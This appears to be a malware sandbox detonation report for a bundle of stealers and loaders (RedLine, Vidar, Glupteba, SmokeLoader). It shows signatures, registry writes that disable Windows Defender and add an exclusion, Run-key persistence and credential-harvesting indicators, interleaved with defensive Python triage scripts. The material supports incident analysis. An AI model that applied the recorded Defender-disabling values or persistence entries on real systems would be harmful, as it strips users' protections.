memory/5668-496-0x0000000000000000-mapping.dmp
memory/5292-509-0x000001AA59990000-0x000001AA59A5F000-memory.dmp
memory/428-507-0x0000000000000000-mapping.dmp
memory/5204-506-0x0000000000000000-mapping.dmp
memory/2424-504-0x0000000000000000-mapping.dmp
memory/5668-505-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5292-500-0x000001AA59920000-0x000001AA5998F000-memory.dmp
memory/5640-494-0x0000000000000000-mapping.dmp
memory/5640-513-0x00000000021B0000-0x00000000021B1000-memory.dmp
memory/2140-510-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2436-514-0x0000000000000000-mapping.dmp
memory/2424-516-0x0000000000700000-0x0000000000701000-memory.dmp
memory/5640-520-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/5640-518-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/5432-517-0x0000000000000000-mapping.dmp
memory/5432-523-0x0000000000400000-0x000000000046D000-memory.dmp
memory/1148-527-0x0000000000000000-mapping.dmp
memory/3460-533-0x0000000000000000-mapping.dmp
memory/1240-526-0x0000000000000000-mapping.dmp
memory/5704-530-0x0000000000000000-mapping.dmp
memory/3140-537-0x0000000000000000-mapping.dmp
memory/2296-532-0x0000000000000000-mapping.dmp
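The dump names above follow two fixed shapes: `memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp` for a dumped region and `memory/<pid>-<seq>-0x<start>-mapping.dmp` for an entry that carries no address range. The parser below is an added example (not part of the sandbox report) that reads those names, groups identical (start, size) ranges that appear in more than one process, and picks out regions dumped at the 32-bit default image base 0x400000. The `SAMPLE_DUMPS` list is a constructed subset of the names listed above; the interpretation that a shared range is the same unpacked payload is a working hypothesis to check against the dump contents, not something the report states.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the dump names listed above.
SAMPLE_DUMPS = """
memory/1572-406-0x0000000005860000-0x0000000005E78000-memory.dmp
memory/5676-409-0x0000000000000000-mapping.dmp
memory/904-460-0x0000000000000000-mapping.dmp
memory/904-481-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5668-496-0x0000000000000000-mapping.dmp
memory/5668-505-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2140-476-0x0000000000000000-mapping.dmp
memory/2140-510-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5292-509-0x000001AA59990000-0x000001AA59A5F000-memory.dmp
memory/5432-523-0x0000000000400000-0x000000000046D000-memory.dmp
""".strip().splitlines()

# memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp : dump of one memory region
# memory/<pid>-<seq>-0x<start>-mapping.dmp        : entry without an address range
REGION_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
MAPPING_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-mapping\.dmp$")


def parse_dump_name(name):
    """Return a dict describing the dump, or None if the name matches neither form."""
    m = REGION_RE.match(name)
    if m:
        pid, seq, start, end = m.groups()
        start, end = int(start, 16), int(end, 16)
        return {"pid": int(pid), "seq": int(seq), "kind": "region",
                "start": start, "end": end, "size": end - start}
    m = MAPPING_RE.match(name)
    if m:
        pid, seq, _ = m.groups()
        return {"pid": int(pid), "seq": int(seq), "kind": "mapping",
                "start": None, "end": None, "size": 0}
    return None


def shared_regions(names):
    """Map (start, size) -> sorted PIDs for region dumps that more than one process shares.
    Identical ranges across processes are worth diffing first: if the bytes match, one
    analysis of the region covers every process that holds it."""
    seen = defaultdict(set)
    for name in names:
        d = parse_dump_name(name)
        if d and d["kind"] == "region":
            seen[(d["start"], d["size"])].add(d["pid"])
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


def image_base_pids(names, base=0x400000):
    """PIDs with a region dump starting at the classic 32-bit default image base.
    Such a region is a candidate unpacked PE: confirm an MZ header before treating it as one."""
    pids = []
    for name in names:
        d = parse_dump_name(name)
        if d and d["kind"] == "region" and d["start"] == base:
            pids.append(d["pid"])
    return pids


def high_address_pids(names, limit=1 << 32):
    """PIDs whose region dumps start above 4 GiB, i.e. in a 64-bit address space."""
    pids = set()
    for name in names:
        d = parse_dump_name(name)
        if d and d["kind"] == "region" and d["start"] >= limit:
            pids.add(d["pid"])
    return sorted(pids)


if __name__ == "__main__":
    for (start, size), pids in shared_regions(SAMPLE_DUMPS).items():
        print(f"0x{start:X} (+0x{size:X}) dumped from PIDs {pids}")
    print("image-base regions:", image_base_pids(SAMPLE_DUMPS))
    print("64-bit processes:", high_address_pids(SAMPLE_DUMPS))
```

Run on the full list rather than the sample, the shared-region map tells you which dumps to open first and which processes to treat as one unit when reversing.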
Analysis: behavioral6
Detonation Overview
Submitted
2021-08-22 20:10
Reported
2021-08-22 20:41
Platform
win11
Max time kernel
435s
Max time network
1770s
Command Line
Signatures
Buran
Glupteba
Glupteba Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socelars
Suspicious use of NtCreateProcessExOtherParentProcess
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 10248 created 10116 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com |
| PID 10248 created 10116 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com |
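Two of the signatures above describe the same kind of process-tree anomaly from different angles: "Process spawned unexpected child process" (wmiprvse.exe, the WMI provider host, spawning rundll32.exe) and "NtCreateUserProcessOtherParentProcess" (svchost.exe, PID 10248, issuing the create call for PID 10116 while the new process records a different parent). The script below is an added example, not part of the report, showing how both rules can be evaluated over process-creation events that record both the creator and the recorded parent. PIDs 10248 and 10116 and their images are taken from the table; every other PID, image and relationship in `EVENTS` is constructed. One caveat a responder needs: the AppInfo service, hosted in svchost.exe, creates UAC-elevated processes and sets the requesting process as their parent, so creator != parent with svchost.exe as creator is also what a legitimate elevation looks like. The example scores that case lower and leaves the verdict to the identity of the recorded parent.

```python
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessCreate:
    pid: int
    image: str
    parent_pid: int   # parent recorded on the new process (what a process tree shows)
    creator_pid: int  # process that actually issued the create call


# Constructed events. Only PIDs 10248/10116 and their images come from the report;
# the rest (PIDs 600, 1000, 4444, 10400, 10401, 10500) are hypothetical.
EVENTS = [
    ProcessCreate(1000, r"C:\Windows\system32\services.exe", 600, 600),
    ProcessCreate(4444, r"C:\Windows\explorer.exe", 1000, 1000),
    ProcessCreate(10248, r"C:\Windows\system32\svchost.exe", 1000, 1000),
    # creator (svchost, 10248) differs from the recorded parent (explorer, 4444)
    ProcessCreate(10116, r"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com", 4444, 10248),
    ProcessCreate(10400, r"C:\Windows\system32\wbem\wmiprvse.exe", 10248, 10248),
    ProcessCreate(10401, r"C:\Windows\system32\rundll32.exe", 10400, 10400),
    # the dropped binary creates a child and points its parent at explorer
    ProcessCreate(10500, r"C:\Windows\system32\notepad.exe", 4444, 10116),
]

WMI_HOST = "wmiprvse.exe"
UNEXPECTED_WMI_CHILDREN = {"rundll32.exe", "cmd.exe", "powershell.exe", "mshta.exe",
                           "regsvr32.exe", "wscript.exe", "cscript.exe"}
# AppInfo (in svchost.exe) reparents UAC-elevated processes to the requester, a benign
# cause of creator != parent; score it lower rather than ignoring it.
UAC_BROKERS = {"svchost.exe"}


def basename(path):
    return ntpath.basename(path).lower()


def evaluate(events):
    """Return (severity, rule, pid) findings for the two signatures shown in the report."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.parent_pid)
        creator = by_pid.get(e.creator_pid)
        if e.creator_pid != e.parent_pid:
            benign_broker = creator is not None and basename(creator.image) in UAC_BROKERS
            findings.append(("medium" if benign_broker else "high", "other-parent-process", e.pid))
        if (parent is not None and basename(parent.image) == WMI_HOST
                and basename(e.image) in UNEXPECTED_WMI_CHILDREN):
            findings.append(("high", "wmi-spawned-child", e.pid))
    return findings


if __name__ == "__main__":
    for severity, rule, pid in evaluate(EVENTS):
        print(f"{severity:6} {rule:22} pid={pid}")
```

On a real host the creator PID is not in a standard process tree; it comes from kernel-level telemetry such as a driver callback or ETW, while Sysmon Event ID 1 shows only the recorded parent. Without the creator field the first rule cannot fire, which is why the sandbox reports it separately from the parent/child rule.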
Turns off Windows Defender SpyNet reporting
Vidar
Windows security bypass
Checks for common network interception software
Deletes shadow copies
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-GRJB0.tmp\3377047_logo_media.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\SETC20F.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\drivers\SETC20F.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
Executes dropped EXE
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\s27w7dhtXK2yj0R0i9jmP7AH.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\83C5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\UkdBd92nKdEVxt7NH_xJ86WB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\J6vAkH5kawOVLHYY8QC6PvMX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\s27w7dhtXK2yj0R0i9jmP7AH.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\dKoMKenWr0odB6tjTFVUEYzN.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\83C5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\PpQsW20a0P92HEBP_c6swrBX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\686.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\tdQsgapgd7CCgb2Nac7hGQFU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\I7r1FrUEwNmYSO5O6BudkuEm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\I7r1FrUEwNmYSO5O6BudkuEm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\dKoMKenWr0odB6tjTFVUEYzN.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\B826.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\tdQsgapgd7CCgb2Nac7hGQFU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\NUc1s3wqp1OTSn6gv7mG4x9h.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5AA1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\A9EC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\lgJGQ8WVm0TB30ZFEEjC5Nff.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\A9EC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\DA0SNTjID05uVTiLF3fjEqmT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\lgJGQ8WVm0TB30ZFEEjC5Nff.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5AA1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\PpQsW20a0P92HEBP_c6swrBX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\686.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\DA0SNTjID05uVTiLF3fjEqmT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\J6vAkH5kawOVLHYY8QC6PvMX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\NUc1s3wqp1OTSn6gv7mG4x9h.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\UkdBd92nKdEVxt7NH_xJ86WB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\B826.exe | N/A |
Loads dropped DLL
Reads local data of messenger clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\EA23.exe = "0" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\INL Corpo Brovse\\Guxexushivy.exe\"" | C:\Users\Admin\AppData\Local\Temp\is-GRJB0.tmp\3377047_logo_media.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\2354821.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\E77.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\TrustedInstaller.exe\" -start" | C:\Users\Admin\AppData\Local\Temp\E77.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
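The "Windows security modification" table above records EA23.exe disabling Defender settings and excluding its own path, and the "Adds Run key to start application" table records several persistence entries, including a binary named TrustedInstaller.exe launched from AppData\Roaming. The script below is an added example, not part of the report, that parses rows of both tables and applies two rule sets: Defender value writes that match known-dangerous settings, and Run/RunOnce commands whose executable lives in a user-writable location or borrows the name of a Windows system binary. One caveat worth noting on the first table: every Defender path recorded sits under WOW6432Node, which is where a 32-bit process lands when it writes HKLM\SOFTWARE\Microsoft\Windows Defender through WOW64 registry redirection. The 64-bit Defender service reads the native key, so the example records the redirection flag instead of treating the writes as a confirmed bypass. `ROWS` is a constructed subset of rows copied from the two tables; the rule tables and location heuristics are the example's own.

```python
import re
import ntpath

# Constructed sample: rows copied from the two signature tables above (a subset).
ROWS = r'''
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\EA23.exe = "0" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\INL Corpo Brovse\\Guxexushivy.exe\"" | C:\Users\Admin\AppData\Local\Temp\is-GRJB0.tmp\3377047_logo_media.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\TrustedInstaller.exe\" -start" | C:\Users\Admin\AppData\Local\Temp\E77.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
'''.strip().splitlines()

# Defender value name (lower-case) -> (data that means "protection off", description)
DEFENDER_TAMPER = {
    "disablerealtimemonitoring": ("1", "real-time monitoring disabled"),
    "tamperprotection": ("0", "tamper protection disabled"),
    "spynetreporting": ("0", "cloud (MAPS/SpyNet) reporting disabled"),
    "submitsamplesconsent": ("0", "sample submission disabled"),
}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
SYSTEM_NAMES = {"trustedinstaller.exe", "svchost.exe", "csrss.exe", "lsass.exe",
                "winlogon.exe", "explorer.exe"}


def parse_row(line):
    """Split one '| desc | indicator | process | target |' row; decode 'path = "data"'."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) != 4:
        return None
    desc, indicator, process, _target = cells
    m = re.match(r'^(.*?) = "(.*)"$', indicator)
    if m:
        path = m.group(1)
        data = re.sub(r"\\(.)", r"\1", m.group(2))  # undo the \\ and \" escaping in the table
    else:
        path, data = indicator, None
    return {"op": desc, "path": path, "data": data, "process": process}


def command_image(cmd):
    """Executable path from a Run-key command line (quoted path, or first token otherwise).
    Unquoted paths containing spaces are ambiguous and are cut at the first space."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ")[0]


def triage(rows):
    """Return findings: ('defender-tamper'|'defender-exclusion', detail, process, via_wow64)
    or ('autorun', image, process, reasons)."""
    findings = []
    for line in rows:
        r = parse_row(line)
        if r is None:
            continue
        path, pl = r["path"], r["path"].lower()
        via_wow64 = "\\wow6432node\\" in pl
        if "\\windows defender\\" in pl and r["data"] is not None:
            if "\\exclusions\\paths\\" in pl:
                excluded = re.split(r"\\exclusions\\paths\\", path, flags=re.I)[1]
                findings.append(("defender-exclusion", excluded, r["process"], via_wow64))
            else:
                name = ntpath.basename(path).lower()
                if name in DEFENDER_TAMPER and r["data"] == DEFENDER_TAMPER[name][0]:
                    findings.append(("defender-tamper", DEFENDER_TAMPER[name][1], r["process"], via_wow64))
        elif re.search(r"\\currentversion\\run(once)?\\", pl) and r["data"]:
            image = command_image(r["data"])
            il = image.lower()
            reasons = []
            if any(s in il for s in USER_WRITABLE):
                reasons.append("user-writable location")
            if ntpath.basename(il) in SYSTEM_NAMES and not il.startswith("c:\\windows\\"):
                reasons.append("system binary name outside C:\\Windows")
            if reasons:
                findings.append(("autorun", image, r["process"], ", ".join(reasons)))
    return findings


if __name__ == "__main__":
    for kind, detail, process, extra in triage(ROWS):
        print(f"{kind:19} {detail}  <- {process}  [{extra}]")
```

The Guxexushivy.exe RunOnce entry under Program Files (x86) is deliberately not flagged by these two location heuristics; it would need a signature or prevalence check instead, which is the usual limit of path-based persistence rules.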
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\s27w7dhtXK2yj0R0i9jmP7AH.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\83C5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\A9EC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\B826.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\686.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\dKoMKenWr0odB6tjTFVUEYzN.exe | N/A |
